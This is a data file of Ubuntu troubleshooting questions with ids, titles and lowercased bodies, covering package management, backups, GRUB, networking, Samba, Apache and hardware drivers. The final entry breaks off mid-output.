245705	aptitude - package removal on jdk installation	i tried the following command aptitude install sun-java6-jdk it prompts me that the following packages will be removed . ant { u } ant-gcj { u } ant-optional { u } ant-optional-gcj { u } ca-certificates-java { u } default-jre { u } default-jre-headless { u } fastjar { u } gcj-4.4-base { u } gcj-4.4-jre-lib { u } icedtea-6-jre-cacao { u } icedtea-netx { u } jarwrapper { u } junit { u } junit4 { u } libasm3-java { u } libaudio2 { u } libcommons-beanutils-java { u } libcommons-codec-java { u } libcommons-collections3-java { u } libcommons-compress-java { u } libcommons-digester-java { u } libcommons-el-java { u } libcommons-httpclient-java { u } libcommons-logging-java { u } libdb-je-java { u } libdb4.7-java { u } libdb4.7-java-gcj { u } libecj-java { u } libequinox-osgi-java { u } libgcj-bc { u } libgcj-common { u } libgcj10 { u } libhamcrest-java { u } libice-dev { u } libicu4j-java { u } libjasper-java { u } libjaxp1.3-java { u } libjetty-java { u } libjline-java { u } libjsch-java { u } libjtidy-java { u } liblucene2-java { u } libpthread-stubs0 { u } libpthread-stubs0-dev { u } libregexp-java { u } libservlet2.4-java { u } libservlet2.5-java { u } libslf4j-java { u } libsm-dev { u } libx11-dev { u } libxau-dev { u } libxcb1-dev { u } libxdmcp-dev { u } libxerces2-java { u } libxt-dev { u } linux-headers-2.6.32-38 { u } linux-headers-2.6.32-38-generic { u } openjdk-6-jre { u } openjdk-6-jre-headless { u } openjdk-6-jre-lib { u } realpath { u } sat4j { u } ttf-dejavu-extra { u } tzdata-java { u } x11proto-core-dev { u } x11proto-input-dev { u } x11proto-kb-dev { u } xtrans-dev { u } is it safe to go ahead when so many dependencies are being removed ? why is it prompting for removal of these dependencies ? thanks
245706	how often does déjà dup backup using `` automatic backups '' setting ?	i have turned on `` automatic backups '' using déjà dup : how often will déjà dup make a backup now ? is it once a day ? the help documentation does n't say .
245707	not able to get the reverse dns working	i had been struggling to get reverse dns working using nslookup on ubuntu 12.04 . here is the output of the nslookup command and the content of the different network related configuration files . what could be the possible reason for the nslookup not working ? also , why do i need an internet connection to get a reverse lookup work for an entry in the /etc/hosts file ? training @ guest1 : /etc/network $ nslookup 192.168.1.101 server : 8.8.8.8 address : 8.8.8.8 # 53 server ca n't find 101.1.168.192.in-addr.arpa . : nxdomain training @ guest1 : /etc/network $ cat /etc/hosts 127.0.0.1 localhost # 127.0.1.1 slave1 192.168.1.101 myubuntulaptop # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters training @ guest1 : /etc/network $ cat /etc/network/interfaces # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.1.201 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.1 dns-nameservers 8.8.8.8 8.8.4.4 training @ guest1 : /etc/network $ ping myubuntulaptop ping myubuntulaptop ( 192.168.1.101 ) 56 ( 84 ) bytes of data . 64 bytes from myubuntulaptop ( 192.168.1.101 ) : icmp_req=1 ttl=64 time=0.113 ms 64 bytes from myubuntulaptop ( 192.168.1.101 ) : icmp_req=2 ttl=64 time=0.222 ms
245708	how can i set déjà dup to keep backups for less than six months ?	déjà dup allows me to choose whether to keep backups for six months , a year , or forever . how do i choose to keep backups for less than six months , say , three months , or even more ?
245709	no menu option in vlc	i do use vlc player for watching movies and i dont have any idea what happened with my vlc i am not getting any icons or anything not even time bar ... its just the video , no preferences nothing ... i know we can get it by ctrl + h , but nothing is happening with that as well . i am not getting any option when i hover over to title bar and when i right click anywhere on the video . how can i solve this issue ? note : i even uninstalled and installed it again but still the same problem
245715	can i delete incremental backups made with déjà dup ?	after using déjà dup for a while , i keep getting this error after every attempt at a backup : backup location is too small . try using one with more space . could i delete some backups made of certain dates only ? for example , could i delete all backups older than a month ? my backup folder contains 372 files , with names like : duplicity-full.20121122t124053z.manifest.gpg duplicity-full.20121122t124053z.vol100.difftar.gpg duplicity-full-signatures.20121122t124053z.sigtar.gpg duplicity-inc.20121122t124053z.to.20121129t151249z.manifest.gpg duplicity-inc.20121122t124053z.to.20121129t151249z.vol1.difftar.gpg duplicity-new-signatures.20121122t124053z.to.20121129t151249z.sigtar.gpg can i delete some of these files safely ?
245718	lenovo u310 will not charge when turned on	i 've looked around and had several friends have a look but we can not figure this out . i am running ubuntu 12.10 on a lenovo u310 . the laptop charges fine when the laptop is off but it will not charge when ubuntu is running . when i plug it in , acpi recognises that the charger is plugged in and charges for a second or two before going back to a state of discharging . edit : the battery is definitely draining over time even if it is plugged in . here is the output for when acpi acknowledges that the charger is plugged in for a few seconds . acpi -b -a battery 0 : charging , 52 % , charging at zero rate - will never fully charge . adapter 0 : on-line edit 2 : this could well be a hardware problem . i 've made a fresh install of windows 7 with correct drivers and i 'm getting the same issue . i can run off of the a/c by disconnecting the battery so i know the adapter is fine .
245719	problems with adobe flash plugin in ubuntu 12.04 lts	though the software center is showing that `` adobe flash plugin '' is installed in my computer , which is a compaq presario c700 running ubuntu 12.04 lts , yet some websites like www.youtube.com is prompting me to download adobe flash plugin to view online streaming . ps : i have the latest version of adobe flash plugin
245724	disk cache is sometimes dropped/erased	i have a memory/cpu monitor running , and sometimes see the graph line for âcached memoryâ drop , for no apparent reason . earlier today cache memory was at about 4.8gb but then dropped in two steps ( a small and a big ) , to 2.3gb . i was not deleting files , sometimes it happens when i run baobab ( disk usage analyser , a graphical recursive version of du ) . kernel is : linux 2.6.32-5-686-bigmem 2013-jan-29 it did it again this time the amount dropped was a lot smaller than what was already free , so i do n't think it is dropping it so that [ some of ] the memory can be used for something else . dark blue=buffers , red=application , green=cache , cyan=total
245725	thunderbirds ca n't send via gmail	everytime i 'm trying to send message this error occured : sending of message failed . the message could not be sent because the connection to smtp server smtp.googlemail.com timed out . try again or contact your network administrator . i 'm using automatic setup , receiving email and other inbox operation just works . here is my outgoing server setup : 1
245731	looking for developers to help me turn ideas into products	can anyone suggest how i might go about looking for young developers who can help me turn linux-based ideas into products ( initially unpaid ) ? i am a business analyst not a coder and have a couple of workable ideas . i do n't have the budget to pay but do have enough to fund hardware , software etc and would cut them in significantly if the products became reality . i do n't think the dev effort would be too massive , more a case of bolting existing technologies together . i am based in london so someone local would be best . can anyone suggest how i might search for someone who would be interested ? thank you in advance .
245732	`` ( xen ) not enough memory to relocate the dom0 kernel image '' ( not iscsi/hba issue )	i 'm trying to isntall xen on ubuntu 12.04 lts for the first time ( running on blade server , 8gb ram , without the naughty iscsi controller , running lsisas1064e ) i 've followed the official ubuntu instructions and got the infamous `` ( xen ) not enough memory to relocate the dom0 kernel image '' error . i tried building the kernel with dom0 support manually ( by following the xen 's mainline linux kernel configs ) as suggested in the ubuntu forums but i keep receiving the error even with my kernels ( needless to say the ubuntu os boots fine with them ) . i 've tried the latest stable kernel ( 3.7.4 ) using both ubuntu 's kernel and manual build from the official sources as well as 3.8.0-rc4 ( from kernel.org ) i 've tried setting the dom0 ram size in /etc/default/grub : grub_default= '' xen 4.1-amd64 '' # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=30 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' '' grub_cmdline_linux= '' rootdelay=180 '' grub_disable_os_prober=true grub_cmdline_linux= '' apparmor=0 '' grub_cmdline_xen_default= '' dom0_mem=512m '' switched the default stack to xl ( as advised here ) and just to be sure - the default bios boot option is the sas . yet , i still keep getting the error . i tried google-ing it but most of the answers are about the qlogic iscsi controller . am i missing something or should i go back to vmaware ?
245733	how to prevent/disable unity 's launcher from launching when dragging ( & dropping ) a file ?	when i drag a file in nautilus to drop it somewhere else ( in a different folder but still within the same nautilus window ) , launcher launches with some `` active '' icons ( the rest of 'em `` disabled '' / `` grayed-out '' for the time of that `` revelation '' ) . which icons are `` active '' depends on the type of file being dragged , but nautilus and the rubbish bin will always ( ? ) be active . i 've noticed this happens in particular when horizontal scroll is visible in nautilus ( e.g. , when you have long file names , etc ) and when the file you drag is the one from the bottom of the list . i 've never found this `` feature '' useful , and would like to disable it . a quick check in ccsm did n't reveal the appropriate on-off switch . what causes this behaviour ? how can i prevent launcher from launching upon drag ( -and-drop ) ?
245738	automatic boot windows on grub dual boot	i have setup a dual boot windows 8 / ubuntu 12.04 , and everything is fine with that . only , as i use windows mainly i would like the grub bootloader to automatically boot up windows instead of ubuntu , which is also useful when installing drivers . is this possible ? to rearrange the priorities on grub ? thanks !
245739	jabber server - ejabberd or jabberd2 ?	i 'm going to run my own jabber server on my ubuntu server . should i use rather ejabberd or jabberd2 daemon ? which of them is better ? what are the differences between them ?
245740	grub problem with windows 8	i had ubuntu 12.10 and win7 in dual-boot . i made the update for win8 , and the grub was ok . i just loggedin on ubuntu and made an update in grub with grub edit ( decrease the waiting time for 2 seconds ) . after that , the grub show , but i ca n't select what entry i want . the problem is that win8 is the default , so i ca n't enter on ubuntu to edit the grub . any idea what 's can i do ?
245743	grub wont boot automatically , needs me to *look* at the options	i have ubuntu 12.10 running on a mcp6p m2+ ver . 6.x board with a phenom quad core processor and 4 gb of ram . i had similar issues with another computer running 12.04 server , not booting after install which required the acpi to be disabled . well , i 'm finding through troubleshooting that grub needs me to just look at the config before it will boot correctly . it 's quite strange . i 've tried boot-repair , and i 've updated grub to acpi_osi=linux , but it will not boot automatically . literally , for it to boot , i have to go into e on grub , then just push f10 to boot ... . making no changes . any ideas how can i resolve this issue ? ?
245746	emacs-like keybindings system-wide ?	is there a way to set emacs-like keyboard shortcuts ( at least the subset mentioned below ) for the whole os ? this is possible in some apps such as the terminal , emacs ( go figure : ) and additionally through special plugins in some other apps ( eclipse ) , but i got so used to c-f-ing through text and never having to jump to arrows that i 'd like to be able to do this system-wide so that i can do it whenever i 'm typing - e.g . searching for songs in rhythmbox , typing stuff into the dash or the hud , writing mails in thunderbird or gmail ... the combos i 'm most interested in are : c-f - forward c-b - backwards c-a - home c-e - end c-d - delete c-k - delete line ( note for non-emacs users - c means ctrl )
245749	`` xampp : could n't start mysql '' on ubuntu 64bit	i installed lampp with these instructions , but phpmadmin did n't work so i tried to uninstall and then install it again and it still does n't work . when i 'm trying to turn it on i get these errors . jeggy @ jeggy-12 : ~/niðurtøkur $ sudo /opt/lampp/lampp start starting xampp for linux 1.8.1 ... xampp : another web server daemon is already running . xampp : starting mysql ... xampp : could n't start mysql ! xampp : another ftp daemon is already running . xampp for linux started . jeggy @ jeggy-12 : ~/niðurtøkur $ i have tried sudo /etc/init.d/apache2 stop and sudo /usr/sbin/apache2ctl stop and none of them work when i go to localhost/phpmyadmin/ i get this error : edit : now i get this error jeggy @ jeggy-12 : ~/niðurtøkur/nspire $ sudo /opt/lampp/lampp start starting xampp for linux 1.8.1 ... xampp : starting apache ... xampp : starting mysql ... xampp : could n't start mysql ! xampp : starting proftpd ... xampp for linux started .
245751	nvidia gtx 590 , 3 monitors 12.10 64bit	i am using ubuntu 12.10 64-bit and have nvidia gtx 590 connected to 3 monitors , i can not for the life of me get all 3 working , i can get 2 running in dual but not 3rd . spent about 1 week still no joy . can anyone with similar config help me ?
245759	export current monitor settings	is there a way to 'export ' the current display configuration ? we just need to export the configuration to an xorg.conf file so that we can import it to another computer ( deployment ) . the active configuration seems to be saved elsewhere than /etc/x11/xorg.conf the monitors are working on the pc and have been set up using the 'display ' configuration tool in the system settings . we 're using 12.04 .
245763	problem in upgrading and opening software center	i am runing ubuntu 12.04 . i can not open ubuntu software center and can not upgrade anything . when i tried to upgrade using terminal with following lines : sudo apt-get update sudo apt-get upgrade my system displayed reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/ubuntuarchive.hnsdc.com_ubuntu_dists_s_ precise_main_binary-i386_packages e : the package lists or status file could not be parsed or opened . can any one guide me what to do . i am new to ubuntu .
245765	how to install cndrvcups-common v.2.3 in quantal ?	trying to install a canon printer , and getting into trouble at some point ( see this question , regarding the 12.10 part ) i noticed that i had not followed exactly what ubuntu documentation recommended for 12.04 : i had installed version 2.4 of the canon driver while the ubuntu website gave a link for v.2.3 . while with 2.4 i have stumbled on the step presented in that question , after removing drivers and trying to install 2.3 version ( cndrvcups-common_2.30-1_i386 ) , i have an unsatisfied dependency : gs-esp but how to install that ? can not find it in synaptic if i enter apt-cache show ghostscript | grep ^provides i only get provides : postscript-viewer output of apt-cache policy ghostscript is installed : 9.06~dfsg-0ubuntu4 candidate : 9.06~dfsg-0ubuntu4 version table : *** 9.06~dfsg-0ubuntu4 0 500 http : //fr.archive.ubuntu.com/ubuntu/ quantal/main i386 packages 100 /var/lib/dpkg/status also , $ sudo dpkg -i cndrvcups-common_2.30-1_i386.deb selecting previously unselected package cndrvcups-common . ( reading database ... 388209 files and directories currently installed . ) unpacking cndrvcups-common ( from cndrvcups-common_2.30-1_i386.deb ) ... dpkg : dependency problems prevent configuration of cndrvcups-common : cndrvcups-common depends on gs-esp ; however : package gs-esp is not installed . dpkg : error processing cndrvcups-common ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : cndrvcups-common
245769	problem installing reader software for estonian id card	so i need to install the latest id card reading software to use my estonian id card . ftp for it is at http : //ftp.id.eesti.ee/pub/id/signed_repository/ubuntu/ problem is that i have no idea how i am supposed to install it from there . all the files are scattered around in folders and i can not add that address to software sources too as it just wont allow it . how can i install this software ?
245771	how to set up script or document to launch from top or side bar ?	i have searched for information about this , but not found anything directly related to it . is there a way to add a document ( for example , a libre office file or text file ) to open when clicked from the top bar or the side bar ? similarly , is there a way to permanently attach an icon to either the top or side bar that when clicked will launch a shell script or a perl script ? dragging a text file , libre office file , or perl script to the launcher does not seem to work as it does for other applications . any ideas or suggestions on where to look for information about this ?
245773	dpkg : error processing linux-headers-3.2.0-35	whenever i install , update or uninstall a program in the terminal , this comes up sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done the following packages will be removed linux-headers-3.2.0-35-generic-pae 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 11.3 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 251024 files and directories currently installed . ) removing linux-headers-3.2.0-35-generic-pae ... dpkg : error processing linux-headers-3.2.0-35-generic-pae ( -- remove ) : unable to securely remove ' : file name too long errors were encountered while processing : linux-headers-3.2.0-35-generic-pae e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i also tried purging dpkg , but the same error from terminal . aptitude also does n't work ! any solutions to fix it ?
245775	lagging minecraft	i 've started playing minecraft , on my windows pc it works flawless but when playing on my ubuntu laptop it runs verry slow . i allready put all minecraft settings to minimal , i 'm running oracle java 7 and opengl is supported . this are my specs : lenovo thinkpad x61s ubuntu 12.10 64bit gnome-shell 4g ram cpu : intel® core™2 duo cpu l7500 @ 1.60ghz × 2 gpu : intel® 965gm 64g ssd appart from my gpu it looks like decent specs to me , is it just the gpu that slows it down or could i do something to speed it up ? thanks in advance
245776	using fastboot in terminal xubuntu 12.10	im trying to unlock my bootloader on my htc one x+ but i always get stuck on using fastboot being unable to find my device . it gets stuck on the `` fastboot oem get_identifier_token '' command with < waiting for device > . i have adt and fastboot on my laptop but its unable to find my device no matter how many times i try it . i have debugging enabled and its in fastboot mode on my phone showing up with `` fastboot usb '' does anyone have a solution to this or a way to get around it ? any help is greatly appreciated .
245777	sudoers for specific command	i 'm running unbuntu 12.04 . i want a script to be able to run `` ip link blah blah ... '' . sudo ./myscript.sh works as intended , but ./myscript.sh gets me : rtnetlink answers : operation not permitted i have these lines in my sodoers file : myusername all = ( all : all ) nopasswd : all % mygroup all = ( all : all ) nopasswd : /sbin/ip , /bin/ip there are no lines following this except a timeout for the timestamp , and the default reference to /etc/sudoers.d /etc/sudoers.d is empty except for the default readme file . nopasswd does not seem to be working either . i have tried moving the lines around so that the timeout and sudoers.d lines are before the ones i mostly care about , with no effect . what have i missed ?
245780	is histacom available on ubuntu ?	i was wondering if histacom can be installed on ubuntu . and if it can instructions would be appreciated . i 've only found a megaupload link ( which prove to be quite useless these days ) .
245781	atheros ar9285 hard blocked on toshiba nb305	my wireless card is hard blocked in any linux distro i install but there is no physical switch on netbook or on wifi card itself ... i runned following commands : inxi -n : network : card-1 : atheros ar9285 wireless network adapter ( pci-express ) driver : ath9k card-2 : realtek rtl8101e/rtl8102e pci express fast ethernet controller driver : r8169 sudo rfkill list : 0 : phy0 : wireless lan soft blocked : no hard blocked : yes any suggestions ? ?
245786	how do i prevent the installation to reboot without finishing ?	i 'm trying to install ubuntu on my windows 7 x64 computer with an usb flash drive . i have put the ubuntu 12.10 desktop amd64 iso on my usb flash drive using both unetbootin and universal usb installer and it works out just fine . restarting the computer , open my bios and boot from usb/put usb as first booting option , ubuntu starts booting its installation gui . everything goes fine , i continue with the installation but when i come to the `` choose how to install '' i choose `` install alongside of windows 7 '' and press reboot to continue . then here 's my question what 's supposed to happen then ? it reboots and then goes into windows like nothing ever happend ? if i choose boot from usb again/if i had put it as primary boot option , i just comes to the installation gui again , the same as before , not what password do you want or it starts installing but the very first run from the cd or install ubuntu options again . how do i get it to continue with the installation ? to clarify a bit more : it does n't reboot unexpectedly but after the same step every time . so it doesnt start to install anything at all .
245787	how to mount writable samba shares ?	i 'd like to mount a folder from my mac on my ubuntu machine . so far i 've enabled file sharing on my mac and enabled samba . on ubuntu i am able to connect to the share by simply navigating to smb : //servername and i can see all my files . great ! so i installed cifs-utils so that i had the cifs files available , then i created an empty folder /mnt/david_mac , and then manually mounted the share using , sudo mount -t cifs //servername/david -o 'username=myusername , password=mypassword , rw , nounix , noserverinfo , sec=ntlmssp ' /mnt/david_mac i can then see my files and folders fine in the /mnt folder . however i can not write to them . what piece of the puzzle am i missing in order to be able to write files back to the mac from my ubuntu system ?
245791	how to unassign alt key from window context menu in gnome	when i use gnome shell , and gnome connectin manager program , and trying alt+s in midnightcommander ( all inside gnome connection manager ) , i get window context menu opened , instead of `` search action '' shortcut in mc . well , its not only about this program , but few more . can not use here trick with `` keyboard shortcuts '' as described here . there is no such meniutem as `` keyboard shortcuts '' . also using trick with escape key is not good , as it 's workaraound , not a solution . how to simply disable this particular alt key behaviour . help me preatty please !
245792	software to _easily_ create hotspot	at this link there is a tricky and not always working solution to activate a wifi-hotspot using wifi . does someone know any program ( like connectify for windows ) that does this ? i understand this question is widely present in all ubuntu websites but i hope some good guy that knows the answer would like to answer us : ) the matter is create a wifi hotspot using the same wireless device connected to wifi . in windows connectify and other software do this smoothly .
245804	give access to a specific user to a specific folder within a group ? [ terminal ]	i have created a file , admin , that i want to assign to a group , admingroup , and later on give a specific user , adminuser , exclusive access to that file but i have no idea how .
245806	what is the correct syntax for /etc/network/interfaces ?	how do i configure /etc/network/interfaces for my wifi ? when i cant to set a static ip for my ethernet card i use the following configuration : # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 192.168.1.xxx network 192.168.1.0 netmask 255.255.255.0 gateway 192.168.1.1 broadcast 192.168.1.255 dns-nameservers 208.67.222.222 dns-search lan dns-domain lan this works a treat , but when i apply the same logic to my wlan0 , it does n't work ! so what is the correct way to set a static ip for my wlan0 ? thanks
245808	view progress of a package installation in terminal	when i am using the ubuntu software updater to install or upgrade packages , i can see a progress bar that shows how much of the installation is complete . when i am using the command line apt-get tool , there is no such progress indicator . is there a way to easily see the progress of a package installation when using a command line application such as apt-get ?
245811	12.10 403 forbidden symlink	i am trying to set up a simple development environment and even after setting all the permissions , i ca n't get past the 403 error < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /var/www < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined < /virtualhost > i can access localhost but not the link : < html > < body > < h1 > it works ! < /h1 > < p > this is the default web page for this server. < /p > < p > the web server software is running but no content has been added , yet. < /p > < p > < a href= '' workspace/sitepath '' > site < /a > < /p > < /body > < /html > the workspace directory is a symbolic link .
245812	how to force quit out of an infinite loop in a bash script gracefully	i wrote a bash script that logs keycodes in a simple file . i have put the code in a while loop because i want it to log continuosly . but if i run the bash script in the terminal , the cursor just keeps blinking suggesting that the file is indeed caught in an infinte loop . now i want to be able to quit this loop gracefully . i do n't know how . ctrl+c wo n't work . i just close the terminal and force quit the process . how do i break out of the while loop as and when the user feels like quitting the program ?
245813	how can i move grub ( `` multiboot '' ) from usb to hard drive	i am new to linux . i installed xubuntu using a usb live disk . it installed correctly however grub ( the multi os loader ) is on the usb . when i boot without the usb it only loads windows . the installation is good since i can boot from the usb , once booted i can remove the stick and verify that the installation is on the hard drive . how do i move safely move the boot mechanism from the usb to the hard drive ?
245814	mobile app development : `` no qmlviewer installed '' when trying to access qt 5 in qt creator	as we all know , trying to force qt creator to use qmlscene instead of qmlviewer is like trying to force eclipse , after already having installed jdt , to use cdt instead . googling `` no qmlviewer installed '' , of course , does return this qt forum result , but there 's no way in the world the `` -qpa '' flag is the default qt creator behavior . by the way , yes i have registered qmlscene with qt creator ( as an external tool ) , and yes , i have tried to get qt 5 working with the creator ( to no avail ) . as for the path variable : it 's defined system-wide , in /etc/bash.bashrc and /etc/profile ( respectively ) and `` echo $ path '' does reveal /opt/qt5/bin in there . and even qmlscene causes problems , as described here , only on an ubuntu 12.10 machine . so there 's no reason for qt creator to be acting up . thanks for the help in advance ...
245817	how to install the new version of `` pokerth '' game via terminal ?	i was trying to install `` pokerth '' with ubuntu software center but it installed an older version of the game . when i ran the game it told me that i must install the newest version of game to play this game online . how can i install the newest version via terminal ?
245822	ca n't see new ubuntu server	i recently set up an old desktop with ubuntu sever 12.04 32 bit . after finishing the installation and logging into the server , i tried to access it from other computers ( both windows and ubuntu ) on the network , but i could n't see it anywhere . any help ?
245825	svn-ssh under ubuntu	i use putty+pageant on windows to be able to access the svn server by using ssh . i have my private key that works . i 'm now trying to use the same key on a ubuntu vm . i used the .p12 key in firefox and it works well . the problem is i ca n't use svn . i tried to follow the istructions that i found in several places on internet but it did not work . the problem is that i do n't know whether i did everything correctly . i 'm using a .p12 file format for the private key . i renamed the key as identity and i copied it in the .ssh folder for my account . i also changed the /etc/ssh/ssh_config file uncommenting the line : identityfile ~/.ssh/identity i used the command : svn co svn+ssh : //myusername @ path_to_rep the result is still svn : network connection closed unexpectedly i removed the -q option in the [ tunnel ] section of the subversion config file and now this is what i can see : agent admitted failure to sign using the key . agent admitted failure to sign using the key . agent admitted failure to sign using the key . permission denied ( publickey ) . svn : network connection closed unexpectedly
245826	network card atheros problem ubuntu 12.10	i installed ubuntu 12.10 and my wireless card seem to have a lower performance compared to linux mint ( any edition ) - i mean it worked fine there . for example it can not connect to a router placed in a room next to mine ( 1 wall ) and it could do it in mint or windows . my wireless card is : 02:00.0 network controller : atheros communications inc. ar9485 wireless network adapter ( rev 01 ) are there any known issues for this card ?
245829	can not install deb files	whenever i try to install an deb files the file opens in the software centre but says internal error can not be opened . please help ?
245833	speed of cd/dvd unit in ubuntu 12.04	i have intalled ubuntu 12.04 on my acer laptop and the problem with the unit of cd/dvd is that it do not reduce the speed of reproduction . in other vertions of ubuntu this probles was solved with `` reduce the speed of the disks when is posible '' ( or , at least , this option solved the problem for me ) but in this vesrsion it is not possible . when i reproduce a dvd picture , the noise of the unit isself and the vibration donáş allow to hear the sound of the picture . i have tried with vlc reproducer but this is not a solution beause even when i reduce the `` speed of reproduction '' in the tools of vlc , the sound is distorted but the speed remain the same .
245838	computer starts , ubuntu asks username and password , and then `` freezes ''	i 've just installed the version 12.04 of ubuntu , and the installation was succesfull , then it asked me to restart computer , everything normal , but when it started again , ubuntu asked for username and password , and then , after i typed them and entered , instead of showing the desktop , it 's just showing the default rainbow like picture of ubuntu . i can move the mouse fluidly , everything seems normal but it 's just waiting there , doing weel , nothing . so i thought about switching off , and when pressing the button , it asked me `` are you sure you want to switch off ? '' which , i believe , was kind of strange cause it was `` frozen-like '' . so what should i do now ? is there anything like the task manager on ubuntu ? or something i could open to see what 's wrong ? ps : first time using ubuntu bye
245844	write numbers to multiple files	i want to write the numbers 1-10 to two different files . i guess i should use the for loop to both print to the files and count from 1 to 10 as it loops but i do n't know how .
245849	packages not found despite correct /etc/apt/source.list	my /etc/apt/sources.list looks like this deb http : //de.archive.ubuntu.com/ubuntu quantal main restricted universe multiverse deb http : //de.archive.ubuntu.com/ubuntu quantal-updates main restricted universe multiverse deb http : //de.archive.ubuntu.com/ubuntu quantal-security main restricted universe multiverse deb http : //de.archive.ubuntu.com/ubuntu quantal-backports main restricted universe multiverse apt-get update is just fine . apt-get clean has no output and apt-get -f install does not install any packages . nevertheless packages like xfce4 or emacs can not be found . the output apt-get update ign http : //ppa.launchpad.net quantal inrelease ign http : //de.archive.ubuntu.com quantal inrelease treffer http : //ppa.launchpad.net quantal release.gpg ign http : //de.archive.ubuntu.com quantal-updates inrelease treffer http : //ppa.launchpad.net quantal release ign http : //de.archive.ubuntu.com quantal-security inrelease ign http : //de.archive.ubuntu.com quantal-backports inrelease treffer http : //ppa.launchpad.net quantal/main sources treffer http : //ppa.launchpad.net quantal/main i386 packages treffer http : //de.archive.ubuntu.com quantal release.gpg treffer http : //de.archive.ubuntu.com quantal-updates release.gpg treffer http : //de.archive.ubuntu.com quantal-security release.gpg treffer http : //de.archive.ubuntu.com quantal-backports release.gpg treffer http : //de.archive.ubuntu.com quantal release treffer http : //de.archive.ubuntu.com quantal-updates release treffer http : //de.archive.ubuntu.com quantal-security release treffer http : //de.archive.ubuntu.com quantal-backports release treffer http : //de.archive.ubuntu.com quantal/main i386 packages treffer http : //de.archive.ubuntu.com quantal/restricted i386 packages treffer http : //de.archive.ubuntu.com quantal/universe i386 packages treffer http : //de.archive.ubuntu.com quantal/multiverse i386 packages ign http : //ppa.launchpad.net quantal/main translation-de_de treffer http : //de.archive.ubuntu.com quantal/main translation-de ign http : //ppa.launchpad.net quantal/main translation-de treffer http : //de.archive.ubuntu.com quantal/main translation-en ign http : //ppa.launchpad.net quantal/main translation-en treffer http : //de.archive.ubuntu.com quantal/multiverse translation-de treffer http : //de.archive.ubuntu.com quantal/multiverse translation-en treffer http : //de.archive.ubuntu.com quantal/restricted translation-de treffer http : //de.archive.ubuntu.com quantal/restricted translation-en treffer http : //de.archive.ubuntu.com quantal/universe translation-de treffer http : //de.archive.ubuntu.com quantal/universe translation-en treffer http : //de.archive.ubuntu.com quantal-updates/main i386 packages treffer http : //de.archive.ubuntu.com quantal-updates/restricted i386 packages treffer http : //de.archive.ubuntu.com quantal-updates/universe i386 packages treffer http : //de.archive.ubuntu.com quantal-updates/multiverse i386 packages treffer http : //de.archive.ubuntu.com quantal-updates/main translation-en treffer http : //de.archive.ubuntu.com quantal-updates/multiverse translation-en treffer http : //de.archive.ubuntu.com quantal-updates/restricted translation-en treffer http : //de.archive.ubuntu.com quantal-updates/universe translation-en treffer http : //de.archive.ubuntu.com quantal-security/main i386 packages treffer http : //de.archive.ubuntu.com quantal-security/restricted i386 packages treffer http : //de.archive.ubuntu.com quantal-security/universe i386 packages treffer http : //de.archive.ubuntu.com quantal-security/multiverse i386 packages treffer http : //de.archive.ubuntu.com quantal-security/main translation-en treffer http : //de.archive.ubuntu.com quantal-security/multiverse translation-en treffer http : //de.archive.ubuntu.com quantal-security/restricted translation-en treffer http : //de.archive.ubuntu.com quantal-security/universe translation-en treffer http : //de.archive.ubuntu.com quantal-backports/main i386 packages treffer http : //de.archive.ubuntu.com quantal-backports/restricted i386 packages treffer http : //de.archive.ubuntu.com quantal-backports/universe i386 packages treffer http : //de.archive.ubuntu.com quantal-backports/multiverse i386 packages treffer http : //de.archive.ubuntu.com quantal-backports/main translation-en treffer http : //de.archive.ubuntu.com quantal-backports/multiverse translation-en treffer http : //de.archive.ubuntu.com quantal-backports/restricted translation-en treffer http : //de.archive.ubuntu.com quantal-backports/universe translation-en ign http : //de.archive.ubuntu.com quantal/main translation-de_de ign http : //de.archive.ubuntu.com quantal/multiverse translation-de_de ign http : //de.archive.ubuntu.com quantal/restricted translation-de_de ign http : //de.archive.ubuntu.com quantal/universe translation-de_de ign http : //de.archive.ubuntu.com quantal-updates/main translation-de_de ign http : //de.archive.ubuntu.com quantal-updates/main translation-de ign http : //de.archive.ubuntu.com quantal-updates/multiverse translation-de_de ign http : //de.archive.ubuntu.com quantal-updates/multiverse translation-de ign http : //de.archive.ubuntu.com quantal-updates/restricted translation-de_de ign http : //de.archive.ubuntu.com quantal-updates/restricted translation-de ign http : //de.archive.ubuntu.com quantal-updates/universe translation-de_de ign http : //de.archive.ubuntu.com quantal-updates/universe translation-de ign http : //de.archive.ubuntu.com quantal-security/main translation-de_de ign http : //de.archive.ubuntu.com quantal-security/main translation-de ign http : //de.archive.ubuntu.com quantal-security/multiverse translation-de_de ign http : //de.archive.ubuntu.com quantal-security/multiverse translation-de ign http : //de.archive.ubuntu.com quantal-security/restricted translation-de_de ign http : //de.archive.ubuntu.com quantal-security/restricted translation-de ign http : //de.archive.ubuntu.com quantal-security/universe translation-de_de ign http : //de.archive.ubuntu.com quantal-security/universe translation-de ign http : //de.archive.ubuntu.com quantal-backports/main translation-de_de ign http : //de.archive.ubuntu.com quantal-backports/main translation-de ign http : //de.archive.ubuntu.com quantal-backports/multiverse translation-de_de ign http : //de.archive.ubuntu.com quantal-backports/multiverse translation-de ign http : //de.archive.ubuntu.com quantal-backports/restricted 